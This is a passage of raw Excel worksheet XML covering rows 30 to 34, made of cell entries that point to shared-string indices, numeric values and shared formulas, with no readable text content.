      <c r="R30" s="75" t="s">
        <v>106</v>
      </c>
      <c r="S30" s="76" t="s">
        <v>443</v>
      </c>
      <c r="T30" s="76" t="s">
        <v>444</v>
      </c>
      <c r="U30" s="77" t="s">
        <v>445</v>
      </c>
      <c r="V30" s="76" t="s">
        <v>144</v>
      </c>
      <c r="W30" s="76" t="s">
        <v>12</v>
      </c>
      <c r="X30" s="75" t="s">
        <v>13</v>
      </c>
      <c r="Y30" s="75" t="s">
        <v>106</v>
      </c>
      <c r="Z30" s="75" t="s">
        <v>112</v>
      </c>
      <c r="AA30" s="99" t="s">
        <v>13</v>
      </c>
      <c r="AB30" s="75" t="s">
        <v>112</v>
      </c>
      <c r="AC30" s="75" t="s">
        <v>13</v>
      </c>
      <c r="AD30" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AE30" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AF30" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AG30" s="79" t="s">
        <v>12</v>
      </c>
      <c r="AH30" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AI30" s="78"/>
      <c r="AJ30" s="78"/>
      <c r="AK30" s="78" t="str">
        <f t="shared" si="2"/>
        <v/>
      </c>
      <c r="AL30" s="78"/>
      <c r="AM30" s="78"/>
      <c r="AN30" s="78"/>
      <c r="AO30" s="78"/>
      <c r="AP30" s="80"/>
      <c r="AQ30" s="80"/>
      <c r="AR30" s="80"/>
      <c r="AS30" s="80">
        <v>0.0</v>
      </c>
      <c r="AT30" s="80"/>
      <c r="AU30" s="80"/>
      <c r="AV30" s="80"/>
      <c r="AW30" s="80"/>
      <c r="AX30" s="80"/>
      <c r="AY30" s="80"/>
      <c r="AZ30" s="81">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="BA30" s="82" t="s">
        <v>12</v>
      </c>
      <c r="BB30" s="82" t="s">
        <v>12</v>
      </c>
      <c r="BC30" s="82" t="s">
        <v>12</v>
      </c>
      <c r="BD30" s="79" t="s">
        <v>12</v>
      </c>
      <c r="BE30" s="82" t="s">
        <v>12</v>
      </c>
      <c r="BF30" s="82"/>
      <c r="BG30" s="82"/>
      <c r="BH30" s="82" t="str">
        <f t="shared" si="4"/>
        <v/>
      </c>
      <c r="BI30" s="82"/>
      <c r="BJ30" s="82"/>
      <c r="BK30" s="82"/>
      <c r="BL30" s="82"/>
      <c r="BM30" s="83"/>
      <c r="BN30" s="83"/>
      <c r="BO30" s="83"/>
      <c r="BP30" s="83">
        <v>0.0</v>
      </c>
      <c r="BQ30" s="83"/>
      <c r="BR30" s="83"/>
      <c r="BS30" s="83"/>
      <c r="BT30" s="83"/>
      <c r="BU30" s="83"/>
      <c r="BV30" s="83"/>
      <c r="BW30" s="84">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="BX30" s="85" t="s">
        <v>446</v>
      </c>
      <c r="BY30" s="85">
        <v>3.0</v>
      </c>
      <c r="BZ30" s="85">
        <v>8.0</v>
      </c>
      <c r="CA30" s="79" t="s">
        <v>12</v>
      </c>
      <c r="CB30" s="85" t="s">
        <v>447</v>
      </c>
      <c r="CC30" s="85"/>
      <c r="CD30" s="85"/>
      <c r="CE30" s="85" t="str">
        <f t="shared" si="6"/>
        <v/>
      </c>
      <c r="CF30" s="85"/>
      <c r="CG30" s="85"/>
      <c r="CH30" s="85"/>
      <c r="CI30" s="85"/>
      <c r="CJ30" s="86"/>
      <c r="CK30" s="86"/>
      <c r="CL30" s="86"/>
      <c r="CM30" s="86">
        <v>1.0</v>
      </c>
      <c r="CN30" s="86"/>
      <c r="CO30" s="86"/>
      <c r="CP30" s="86"/>
      <c r="CQ30" s="86"/>
      <c r="CR30" s="86"/>
      <c r="CS30" s="86"/>
      <c r="CT30" s="87">
        <f t="shared" si="7"/>
        <v>1</v>
      </c>
      <c r="CU30" s="88" t="s">
        <v>448</v>
      </c>
      <c r="CV30" s="88">
        <v>6.0</v>
      </c>
      <c r="CW30" s="88">
        <v>13.0</v>
      </c>
      <c r="CX30" s="79" t="s">
        <v>149</v>
      </c>
      <c r="CY30" s="88" t="s">
        <v>449</v>
      </c>
      <c r="CZ30" s="88"/>
      <c r="DA30" s="88"/>
      <c r="DB30" s="88" t="str">
        <f t="shared" si="8"/>
        <v/>
      </c>
      <c r="DC30" s="88"/>
      <c r="DD30" s="88"/>
      <c r="DE30" s="88"/>
      <c r="DF30" s="88"/>
      <c r="DG30" s="89"/>
      <c r="DH30" s="89"/>
      <c r="DI30" s="89"/>
      <c r="DJ30" s="89">
        <v>1.0</v>
      </c>
      <c r="DK30" s="89"/>
      <c r="DL30" s="89"/>
      <c r="DM30" s="89"/>
      <c r="DN30" s="89"/>
      <c r="DO30" s="89"/>
      <c r="DP30" s="89"/>
      <c r="DQ30" s="90">
        <f t="shared" si="9"/>
        <v>1</v>
      </c>
      <c r="DR30" s="91"/>
      <c r="DS30" s="93" t="s">
        <v>12</v>
      </c>
      <c r="DT30" s="93" t="s">
        <v>12</v>
      </c>
      <c r="DU30" s="93" t="s">
        <v>12</v>
      </c>
      <c r="DV30" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DW30" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DX30" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DY30" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DZ30" s="94" t="s">
        <v>12</v>
      </c>
      <c r="EA30" s="94" t="s">
        <v>12</v>
      </c>
      <c r="EB30" s="74">
        <v>3.0</v>
      </c>
      <c r="EC30" s="74">
        <v>0.0</v>
      </c>
      <c r="ED30" s="95">
        <f t="shared" si="10"/>
        <v>0</v>
      </c>
      <c r="EE30" s="96" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="31" ht="153.75" customHeight="1">
      <c r="B31" s="71" t="s">
        <v>450</v>
      </c>
      <c r="C31" s="72" t="s">
        <v>12</v>
      </c>
      <c r="D31" s="72" t="s">
        <v>451</v>
      </c>
      <c r="E31" s="72" t="s">
        <v>452</v>
      </c>
      <c r="F31" s="72" t="s">
        <v>453</v>
      </c>
      <c r="G31" s="72" t="s">
        <v>454</v>
      </c>
      <c r="H31" s="72" t="s">
        <v>455</v>
      </c>
      <c r="I31" s="73" t="s">
        <v>456</v>
      </c>
      <c r="J31" s="73" t="s">
        <v>211</v>
      </c>
      <c r="K31" s="73" t="s">
        <v>457</v>
      </c>
      <c r="L31" s="74">
        <v>3.0</v>
      </c>
      <c r="M31" s="74">
        <v>1.0</v>
      </c>
      <c r="N31" s="74">
        <v>1.0</v>
      </c>
      <c r="O31" s="74">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="P31" s="74">
        <v>1.0</v>
      </c>
      <c r="Q31" s="74">
        <v>0.0</v>
      </c>
      <c r="R31" s="75" t="s">
        <v>187</v>
      </c>
      <c r="S31" s="76" t="s">
        <v>12</v>
      </c>
      <c r="T31" s="76" t="s">
        <v>458</v>
      </c>
      <c r="U31" s="77" t="s">
        <v>459</v>
      </c>
      <c r="V31" s="76" t="s">
        <v>460</v>
      </c>
      <c r="W31" s="76" t="s">
        <v>461</v>
      </c>
      <c r="X31" s="75" t="s">
        <v>13</v>
      </c>
      <c r="Y31" s="75" t="s">
        <v>241</v>
      </c>
      <c r="Z31" s="75" t="s">
        <v>112</v>
      </c>
      <c r="AA31" s="99" t="s">
        <v>13</v>
      </c>
      <c r="AB31" s="75" t="s">
        <v>112</v>
      </c>
      <c r="AC31" s="75" t="s">
        <v>13</v>
      </c>
      <c r="AD31" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AE31" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AF31" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AG31" s="79" t="s">
        <v>12</v>
      </c>
      <c r="AH31" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AI31" s="78"/>
      <c r="AJ31" s="78"/>
      <c r="AK31" s="78" t="str">
        <f t="shared" si="2"/>
        <v/>
      </c>
      <c r="AL31" s="78"/>
      <c r="AM31" s="78"/>
      <c r="AN31" s="78"/>
      <c r="AO31" s="78"/>
      <c r="AP31" s="80"/>
      <c r="AQ31" s="80"/>
      <c r="AR31" s="80"/>
      <c r="AS31" s="80">
        <v>0.0</v>
      </c>
      <c r="AT31" s="80"/>
      <c r="AU31" s="80"/>
      <c r="AV31" s="80"/>
      <c r="AW31" s="80"/>
      <c r="AX31" s="80"/>
      <c r="AY31" s="80"/>
      <c r="AZ31" s="81">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="BA31" s="82" t="s">
        <v>12</v>
      </c>
      <c r="BB31" s="82" t="s">
        <v>12</v>
      </c>
      <c r="BC31" s="82" t="s">
        <v>12</v>
      </c>
      <c r="BD31" s="79" t="s">
        <v>12</v>
      </c>
      <c r="BE31" s="82" t="s">
        <v>12</v>
      </c>
      <c r="BF31" s="82"/>
      <c r="BG31" s="82"/>
      <c r="BH31" s="82" t="str">
        <f t="shared" si="4"/>
        <v/>
      </c>
      <c r="BI31" s="82"/>
      <c r="BJ31" s="82"/>
      <c r="BK31" s="82"/>
      <c r="BL31" s="82"/>
      <c r="BM31" s="83"/>
      <c r="BN31" s="83"/>
      <c r="BO31" s="83"/>
      <c r="BP31" s="83">
        <v>0.0</v>
      </c>
      <c r="BQ31" s="83"/>
      <c r="BR31" s="83"/>
      <c r="BS31" s="83"/>
      <c r="BT31" s="83"/>
      <c r="BU31" s="83"/>
      <c r="BV31" s="83"/>
      <c r="BW31" s="84">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="BX31" s="85" t="s">
        <v>12</v>
      </c>
      <c r="BY31" s="85" t="s">
        <v>12</v>
      </c>
      <c r="BZ31" s="85" t="s">
        <v>12</v>
      </c>
      <c r="CA31" s="79" t="s">
        <v>12</v>
      </c>
      <c r="CB31" s="85" t="s">
        <v>12</v>
      </c>
      <c r="CC31" s="85"/>
      <c r="CD31" s="85"/>
      <c r="CE31" s="85" t="str">
        <f t="shared" si="6"/>
        <v/>
      </c>
      <c r="CF31" s="85"/>
      <c r="CG31" s="85"/>
      <c r="CH31" s="85"/>
      <c r="CI31" s="85"/>
      <c r="CJ31" s="86"/>
      <c r="CK31" s="86"/>
      <c r="CL31" s="86"/>
      <c r="CM31" s="86">
        <v>0.0</v>
      </c>
      <c r="CN31" s="86"/>
      <c r="CO31" s="86"/>
      <c r="CP31" s="86"/>
      <c r="CQ31" s="86"/>
      <c r="CR31" s="86"/>
      <c r="CS31" s="86"/>
      <c r="CT31" s="87">
        <f t="shared" si="7"/>
        <v>0</v>
      </c>
      <c r="CU31" s="88" t="s">
        <v>149</v>
      </c>
      <c r="CV31" s="88">
        <v>2.0</v>
      </c>
      <c r="CW31" s="88">
        <v>2.0</v>
      </c>
      <c r="CX31" s="79" t="s">
        <v>149</v>
      </c>
      <c r="CY31" s="88" t="s">
        <v>12</v>
      </c>
      <c r="CZ31" s="88"/>
      <c r="DA31" s="88"/>
      <c r="DB31" s="88" t="str">
        <f t="shared" si="8"/>
        <v/>
      </c>
      <c r="DC31" s="88"/>
      <c r="DD31" s="88"/>
      <c r="DE31" s="88"/>
      <c r="DF31" s="88"/>
      <c r="DG31" s="89"/>
      <c r="DH31" s="89"/>
      <c r="DI31" s="89"/>
      <c r="DJ31" s="89">
        <v>0.0</v>
      </c>
      <c r="DK31" s="89"/>
      <c r="DL31" s="89"/>
      <c r="DM31" s="89"/>
      <c r="DN31" s="89"/>
      <c r="DO31" s="89"/>
      <c r="DP31" s="89"/>
      <c r="DQ31" s="90">
        <f t="shared" si="9"/>
        <v>0</v>
      </c>
      <c r="DR31" s="91"/>
      <c r="DS31" s="93" t="s">
        <v>12</v>
      </c>
      <c r="DT31" s="93" t="s">
        <v>12</v>
      </c>
      <c r="DU31" s="93" t="s">
        <v>12</v>
      </c>
      <c r="DV31" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DW31" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DX31" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DY31" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DZ31" s="94" t="s">
        <v>12</v>
      </c>
      <c r="EA31" s="94" t="s">
        <v>12</v>
      </c>
      <c r="EB31" s="74">
        <v>3.0</v>
      </c>
      <c r="EC31" s="74">
        <v>0.0</v>
      </c>
      <c r="ED31" s="95">
        <f t="shared" si="10"/>
        <v>0</v>
      </c>
      <c r="EE31" s="96" t="s">
        <v>112</v>
      </c>
    </row>
    <row r="32" ht="153.75" customHeight="1">
      <c r="B32" s="71" t="s">
        <v>450</v>
      </c>
      <c r="C32" s="72" t="s">
        <v>12</v>
      </c>
      <c r="D32" s="72" t="s">
        <v>451</v>
      </c>
      <c r="E32" s="72" t="s">
        <v>452</v>
      </c>
      <c r="F32" s="72" t="s">
        <v>453</v>
      </c>
      <c r="G32" s="72" t="s">
        <v>454</v>
      </c>
      <c r="H32" s="72" t="s">
        <v>455</v>
      </c>
      <c r="I32" s="73" t="s">
        <v>456</v>
      </c>
      <c r="J32" s="73" t="s">
        <v>462</v>
      </c>
      <c r="K32" s="73" t="s">
        <v>463</v>
      </c>
      <c r="L32" s="74">
        <v>27710.0</v>
      </c>
      <c r="M32" s="74">
        <v>1.0</v>
      </c>
      <c r="N32" s="74">
        <v>1.0</v>
      </c>
      <c r="O32" s="74">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="P32" s="74">
        <v>1.0</v>
      </c>
      <c r="Q32" s="74">
        <v>0.0</v>
      </c>
      <c r="R32" s="75" t="s">
        <v>106</v>
      </c>
      <c r="S32" s="76" t="s">
        <v>464</v>
      </c>
      <c r="T32" s="76" t="s">
        <v>12</v>
      </c>
      <c r="U32" s="77" t="s">
        <v>256</v>
      </c>
      <c r="V32" s="76" t="s">
        <v>465</v>
      </c>
      <c r="W32" s="76" t="s">
        <v>256</v>
      </c>
      <c r="X32" s="75" t="s">
        <v>13</v>
      </c>
      <c r="Y32" s="75" t="s">
        <v>106</v>
      </c>
      <c r="Z32" s="75" t="s">
        <v>112</v>
      </c>
      <c r="AA32" s="99" t="s">
        <v>13</v>
      </c>
      <c r="AB32" s="75" t="s">
        <v>112</v>
      </c>
      <c r="AC32" s="75" t="s">
        <v>13</v>
      </c>
      <c r="AD32" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AE32" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AF32" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AG32" s="79" t="s">
        <v>12</v>
      </c>
      <c r="AH32" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AI32" s="78"/>
      <c r="AJ32" s="78"/>
      <c r="AK32" s="78" t="str">
        <f t="shared" si="2"/>
        <v/>
      </c>
      <c r="AL32" s="78"/>
      <c r="AM32" s="78"/>
      <c r="AN32" s="78"/>
      <c r="AO32" s="78"/>
      <c r="AP32" s="80"/>
      <c r="AQ32" s="80"/>
      <c r="AR32" s="80"/>
      <c r="AS32" s="80">
        <v>0.0</v>
      </c>
      <c r="AT32" s="80"/>
      <c r="AU32" s="80"/>
      <c r="AV32" s="80"/>
      <c r="AW32" s="80"/>
      <c r="AX32" s="80"/>
      <c r="AY32" s="80"/>
      <c r="AZ32" s="81">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="BA32" s="82" t="s">
        <v>12</v>
      </c>
      <c r="BB32" s="82" t="s">
        <v>12</v>
      </c>
      <c r="BC32" s="82" t="s">
        <v>12</v>
      </c>
      <c r="BD32" s="79" t="s">
        <v>12</v>
      </c>
      <c r="BE32" s="82" t="s">
        <v>12</v>
      </c>
      <c r="BF32" s="82"/>
      <c r="BG32" s="82"/>
      <c r="BH32" s="82" t="str">
        <f t="shared" si="4"/>
        <v/>
      </c>
      <c r="BI32" s="82"/>
      <c r="BJ32" s="82"/>
      <c r="BK32" s="82"/>
      <c r="BL32" s="82"/>
      <c r="BM32" s="83"/>
      <c r="BN32" s="83"/>
      <c r="BO32" s="83"/>
      <c r="BP32" s="83">
        <v>0.0</v>
      </c>
      <c r="BQ32" s="83"/>
      <c r="BR32" s="83"/>
      <c r="BS32" s="83"/>
      <c r="BT32" s="83"/>
      <c r="BU32" s="83"/>
      <c r="BV32" s="83"/>
      <c r="BW32" s="84">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="BX32" s="85" t="s">
        <v>12</v>
      </c>
      <c r="BY32" s="85" t="s">
        <v>12</v>
      </c>
      <c r="BZ32" s="85" t="s">
        <v>12</v>
      </c>
      <c r="CA32" s="79" t="s">
        <v>12</v>
      </c>
      <c r="CB32" s="85" t="s">
        <v>12</v>
      </c>
      <c r="CC32" s="85"/>
      <c r="CD32" s="85"/>
      <c r="CE32" s="85" t="str">
        <f t="shared" si="6"/>
        <v/>
      </c>
      <c r="CF32" s="85"/>
      <c r="CG32" s="85"/>
      <c r="CH32" s="85"/>
      <c r="CI32" s="85"/>
      <c r="CJ32" s="86"/>
      <c r="CK32" s="86"/>
      <c r="CL32" s="86"/>
      <c r="CM32" s="86">
        <v>0.0</v>
      </c>
      <c r="CN32" s="86"/>
      <c r="CO32" s="86"/>
      <c r="CP32" s="86"/>
      <c r="CQ32" s="86"/>
      <c r="CR32" s="86"/>
      <c r="CS32" s="86"/>
      <c r="CT32" s="87">
        <f t="shared" si="7"/>
        <v>0</v>
      </c>
      <c r="CU32" s="88" t="s">
        <v>466</v>
      </c>
      <c r="CV32" s="88">
        <v>2.0</v>
      </c>
      <c r="CW32" s="88">
        <v>2.0</v>
      </c>
      <c r="CX32" s="79" t="s">
        <v>149</v>
      </c>
      <c r="CY32" s="88" t="s">
        <v>12</v>
      </c>
      <c r="CZ32" s="88"/>
      <c r="DA32" s="88"/>
      <c r="DB32" s="88" t="str">
        <f t="shared" si="8"/>
        <v/>
      </c>
      <c r="DC32" s="88"/>
      <c r="DD32" s="88"/>
      <c r="DE32" s="88"/>
      <c r="DF32" s="88"/>
      <c r="DG32" s="89"/>
      <c r="DH32" s="89"/>
      <c r="DI32" s="89"/>
      <c r="DJ32" s="89">
        <v>0.0</v>
      </c>
      <c r="DK32" s="89"/>
      <c r="DL32" s="89"/>
      <c r="DM32" s="89"/>
      <c r="DN32" s="89"/>
      <c r="DO32" s="89"/>
      <c r="DP32" s="89"/>
      <c r="DQ32" s="90">
        <f t="shared" si="9"/>
        <v>0</v>
      </c>
      <c r="DR32" s="91"/>
      <c r="DS32" s="93" t="s">
        <v>12</v>
      </c>
      <c r="DT32" s="93" t="s">
        <v>12</v>
      </c>
      <c r="DU32" s="93" t="s">
        <v>12</v>
      </c>
      <c r="DV32" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DW32" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DX32" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DY32" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DZ32" s="94" t="s">
        <v>12</v>
      </c>
      <c r="EA32" s="94" t="s">
        <v>12</v>
      </c>
      <c r="EB32" s="74">
        <v>27710.0</v>
      </c>
      <c r="EC32" s="74">
        <v>0.0</v>
      </c>
      <c r="ED32" s="95">
        <f t="shared" si="10"/>
        <v>0</v>
      </c>
      <c r="EE32" s="96" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="33" ht="153.75" customHeight="1">
      <c r="B33" s="71" t="s">
        <v>450</v>
      </c>
      <c r="C33" s="72" t="s">
        <v>12</v>
      </c>
      <c r="D33" s="72" t="s">
        <v>451</v>
      </c>
      <c r="E33" s="72" t="s">
        <v>452</v>
      </c>
      <c r="F33" s="72" t="s">
        <v>453</v>
      </c>
      <c r="G33" s="72" t="s">
        <v>454</v>
      </c>
      <c r="H33" s="72" t="s">
        <v>455</v>
      </c>
      <c r="I33" s="73" t="s">
        <v>456</v>
      </c>
      <c r="J33" s="73" t="s">
        <v>467</v>
      </c>
      <c r="K33" s="73" t="s">
        <v>468</v>
      </c>
      <c r="L33" s="74">
        <v>92005.0</v>
      </c>
      <c r="M33" s="74">
        <v>1.0</v>
      </c>
      <c r="N33" s="74">
        <v>1.0</v>
      </c>
      <c r="O33" s="74">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="P33" s="74">
        <v>1.0</v>
      </c>
      <c r="Q33" s="74">
        <v>0.0</v>
      </c>
      <c r="R33" s="75" t="s">
        <v>106</v>
      </c>
      <c r="S33" s="76" t="s">
        <v>464</v>
      </c>
      <c r="T33" s="76" t="s">
        <v>12</v>
      </c>
      <c r="U33" s="77" t="s">
        <v>256</v>
      </c>
      <c r="V33" s="76" t="s">
        <v>469</v>
      </c>
      <c r="W33" s="76" t="s">
        <v>256</v>
      </c>
      <c r="X33" s="75" t="s">
        <v>13</v>
      </c>
      <c r="Y33" s="75" t="s">
        <v>106</v>
      </c>
      <c r="Z33" s="75" t="s">
        <v>112</v>
      </c>
      <c r="AA33" s="99" t="s">
        <v>13</v>
      </c>
      <c r="AB33" s="75" t="s">
        <v>112</v>
      </c>
      <c r="AC33" s="75" t="s">
        <v>13</v>
      </c>
      <c r="AD33" s="78">
        <v>650.0</v>
      </c>
      <c r="AE33" s="78">
        <v>1.0</v>
      </c>
      <c r="AF33" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AG33" s="79" t="s">
        <v>12</v>
      </c>
      <c r="AH33" s="78">
        <v>650.0</v>
      </c>
      <c r="AI33" s="78"/>
      <c r="AJ33" s="78"/>
      <c r="AK33" s="78" t="str">
        <f t="shared" si="2"/>
        <v/>
      </c>
      <c r="AL33" s="78"/>
      <c r="AM33" s="78"/>
      <c r="AN33" s="78"/>
      <c r="AO33" s="78"/>
      <c r="AP33" s="80"/>
      <c r="AQ33" s="80"/>
      <c r="AR33" s="80"/>
      <c r="AS33" s="80">
        <v>0.0</v>
      </c>
      <c r="AT33" s="80"/>
      <c r="AU33" s="80"/>
      <c r="AV33" s="80"/>
      <c r="AW33" s="80"/>
      <c r="AX33" s="80"/>
      <c r="AY33" s="80"/>
      <c r="AZ33" s="81">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="BA33" s="82" t="s">
        <v>470</v>
      </c>
      <c r="BB33" s="82">
        <v>3.0</v>
      </c>
      <c r="BC33" s="82" t="s">
        <v>12</v>
      </c>
      <c r="BD33" s="79" t="s">
        <v>12</v>
      </c>
      <c r="BE33" s="82" t="s">
        <v>470</v>
      </c>
      <c r="BF33" s="82"/>
      <c r="BG33" s="82"/>
      <c r="BH33" s="82" t="str">
        <f t="shared" si="4"/>
        <v/>
      </c>
      <c r="BI33" s="82"/>
      <c r="BJ33" s="82"/>
      <c r="BK33" s="82"/>
      <c r="BL33" s="82"/>
      <c r="BM33" s="83"/>
      <c r="BN33" s="83"/>
      <c r="BO33" s="83"/>
      <c r="BP33" s="83">
        <v>0.0</v>
      </c>
      <c r="BQ33" s="83"/>
      <c r="BR33" s="83"/>
      <c r="BS33" s="83"/>
      <c r="BT33" s="83"/>
      <c r="BU33" s="83"/>
      <c r="BV33" s="83"/>
      <c r="BW33" s="84">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="BX33" s="85" t="s">
        <v>471</v>
      </c>
      <c r="BY33" s="85">
        <v>5.0</v>
      </c>
      <c r="BZ33" s="85" t="s">
        <v>12</v>
      </c>
      <c r="CA33" s="79" t="s">
        <v>12</v>
      </c>
      <c r="CB33" s="85" t="s">
        <v>472</v>
      </c>
      <c r="CC33" s="85"/>
      <c r="CD33" s="85"/>
      <c r="CE33" s="85" t="str">
        <f t="shared" si="6"/>
        <v/>
      </c>
      <c r="CF33" s="85"/>
      <c r="CG33" s="85"/>
      <c r="CH33" s="85"/>
      <c r="CI33" s="85"/>
      <c r="CJ33" s="86"/>
      <c r="CK33" s="86"/>
      <c r="CL33" s="86"/>
      <c r="CM33" s="86">
        <v>1.0</v>
      </c>
      <c r="CN33" s="86"/>
      <c r="CO33" s="86"/>
      <c r="CP33" s="86"/>
      <c r="CQ33" s="86"/>
      <c r="CR33" s="86"/>
      <c r="CS33" s="86"/>
      <c r="CT33" s="87">
        <f t="shared" si="7"/>
        <v>1</v>
      </c>
      <c r="CU33" s="88" t="s">
        <v>473</v>
      </c>
      <c r="CV33" s="88">
        <v>9.0</v>
      </c>
      <c r="CW33" s="88" t="s">
        <v>12</v>
      </c>
      <c r="CX33" s="79" t="s">
        <v>12</v>
      </c>
      <c r="CY33" s="88" t="s">
        <v>474</v>
      </c>
      <c r="CZ33" s="88"/>
      <c r="DA33" s="88"/>
      <c r="DB33" s="88" t="str">
        <f t="shared" si="8"/>
        <v/>
      </c>
      <c r="DC33" s="88"/>
      <c r="DD33" s="88"/>
      <c r="DE33" s="88"/>
      <c r="DF33" s="88"/>
      <c r="DG33" s="89"/>
      <c r="DH33" s="89"/>
      <c r="DI33" s="89"/>
      <c r="DJ33" s="89">
        <v>1.0</v>
      </c>
      <c r="DK33" s="89"/>
      <c r="DL33" s="89"/>
      <c r="DM33" s="89"/>
      <c r="DN33" s="89"/>
      <c r="DO33" s="89"/>
      <c r="DP33" s="89"/>
      <c r="DQ33" s="90">
        <f t="shared" si="9"/>
        <v>1</v>
      </c>
      <c r="DR33" s="91"/>
      <c r="DS33" s="93" t="s">
        <v>12</v>
      </c>
      <c r="DT33" s="93" t="s">
        <v>12</v>
      </c>
      <c r="DU33" s="93" t="s">
        <v>12</v>
      </c>
      <c r="DV33" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DW33" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DX33" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DY33" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DZ33" s="94" t="s">
        <v>12</v>
      </c>
      <c r="EA33" s="94" t="s">
        <v>12</v>
      </c>
      <c r="EB33" s="74">
        <v>92005.0</v>
      </c>
      <c r="EC33" s="74">
        <v>0.0</v>
      </c>
      <c r="ED33" s="95">
        <f t="shared" si="10"/>
        <v>0</v>
      </c>
      <c r="EE33" s="96" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="34" ht="153.75" customHeight="1">
      <c r="B34" s="71" t="s">
        <v>450</v>
      </c>
      <c r="C34" s="72" t="s">
        <v>12</v>
      </c>
      <c r="D34" s="72" t="s">
        <v>451</v>
      </c>
      <c r="E34" s="72" t="s">
        <v>452</v>
      </c>
      <c r="F34" s="72" t="s">
        <v>453</v>
      </c>
      <c r="G34" s="72" t="s">
        <v>454</v>
      </c>
      <c r="H34" s="72" t="s">
        <v>455</v>
      </c>
      <c r="I34" s="73" t="s">
        <v>475</v>
      </c>
      <c r="J34" s="73" t="s">
        <v>476</v>
      </c>
      <c r="K34" s="73" t="s">
        <v>477</v>
      </c>
      <c r="L34" s="74">
        <v>1.0</v>
      </c>
      <c r="M34" s="74">
        <v>1.0</v>
      </c>
      <c r="N34" s="74">
        <v>1.0</v>
      </c>
      <c r="O34" s="74">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="P34" s="74">
        <v>1.0</v>
      </c>
      <c r="Q34" s="74">
        <v>0.0</v>
      </c>
      <c r="R34" s="75" t="s">
        <v>187</v>
      </c>
      <c r="S34" s="76" t="s">
        <v>12</v>
      </c>
      <c r="T34" s="76" t="s">
        <v>12</v>
      </c>
      <c r="U34" s="77" t="s">
        <v>478</v>
      </c>
      <c r="V34" s="76" t="s">
        <v>479</v>
      </c>
      <c r="W34" s="76" t="s">
        <v>480</v>
      </c>
      <c r="X34" s="75" t="s">
        <v>13</v>
      </c>
      <c r="Y34" s="75" t="s">
        <v>241</v>
      </c>
      <c r="Z34" s="75" t="s">
        <v>112</v>
      </c>
      <c r="AA34" s="99" t="s">
        <v>13</v>
      </c>
      <c r="AB34" s="75" t="s">
        <v>112</v>
      </c>
      <c r="AC34" s="75" t="s">
        <v>13</v>
      </c>
      <c r="AD34" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AE34" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AF34" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AG34" s="79" t="s">
        <v>12</v>
      </c>
      <c r="AH34" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AI34" s="78"/>
      <c r="AJ34" s="78"/>
      <c r="AK34" s="78" t="str">
        <f t="shared" si="2"/>
        <v/>
      </c>
      <c r="AL34" s="78"/>
      <c r="AM34" s="78"/>
      <c r="AN34" s="78"/>
      <c r="AO34" s="78"/>
      <c r="AP34" s="80"/>
      <c r="AQ34" s="80"/>
      <c r="AR34" s="80"/>
      <c r="AS34" s="80">
        <v>0.0</v>
      </c>
      <c r="AT34" s="80"/>
      <c r="AU34" s="80"/>
      <c r="AV34" s="80"/>
      <c r="AW34" s="80"/>
      <c r="AX34" s="80"/>
      <c r="AY34" s="80"/>
      <c r="AZ34" s="81">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="BA34" s="82" t="s">
        <v>12</v>
      </c>
      <c r="BB34" s="82" t="s">
        <v>12</v>
      </c>
      <c r="BC34" s="82" t="s">
        <v>12</v>
      </c>
      <c r="BD34" s="79" t="s">
        <v>12</v>
      </c>
      <c r="BE34" s="82" t="s">
        <v>12</v>
      </c>
      <c r="BF34" s="82"/>
      <c r="BG34" s="82"/>
      <c r="BH34" s="82" t="str">
        <f t="shared" si="4"/>
        <v/>
      </c>
      <c r="BI34" s="82"/>
      <c r="BJ34" s="82"/>
      <c r="BK34" s="82"/>
      <c r="BL34" s="82"/>
      <c r="BM34" s="83"/>
      <c r="BN34" s="83"/>
      <c r="BO34" s="83"/>
      <c r="BP34" s="83">
        <v>0.0</v>
      </c>
      <c r="BQ34" s="83"/>
      <c r="BR34" s="83"/>
      <c r="BS34" s="83"/>
